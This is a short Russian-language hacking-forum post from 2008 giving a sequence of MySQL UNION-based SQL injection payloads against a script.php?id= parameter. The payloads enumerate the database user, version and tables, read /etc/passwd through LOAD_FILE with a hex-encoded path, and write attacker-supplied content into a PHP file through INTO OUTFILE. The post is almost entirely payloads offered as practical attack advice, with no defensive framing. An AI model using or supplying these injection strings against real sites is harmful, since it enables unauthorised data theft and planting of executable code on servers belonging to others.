13.12.2008, 12:17
|
|
Участник форума
Регистрация: 27.10.2008
Сообщений: 278
Провел на форуме:
1495545
Репутация:
242
|
|
Для начала
script.php?id=-1+union+select+user()/*
script.php?id=-1+union+select+version()/*
script.php?id=-1+union+select+database()/*
script.php?id=-1+union+select+table_name+from+INFORMATION_SCHEMA. TABLES/*
потом пробуй
прочитать файл(нужно знать путь до него)
script.php?id=-1+union+select+LOAD_FILE(0x276574632f7061737377642 f)/*
записать в файл
script.php?id=-1+union+select+0xКОДИРОВАННАЯСТРО А+into+outfile+'/tmp/aaa.php'/*
где 0x276574632f7061737377642f это
"0х" - преффикс HEX
"276574632f7061737377642f" = "'etc/passwd'"
(http://www.string-functions.com/string-hex.aspx)
p.s. пробелы лишние убери.
Последний раз редактировалось preda1or; 13.12.2008 в 12:23..
|
|
|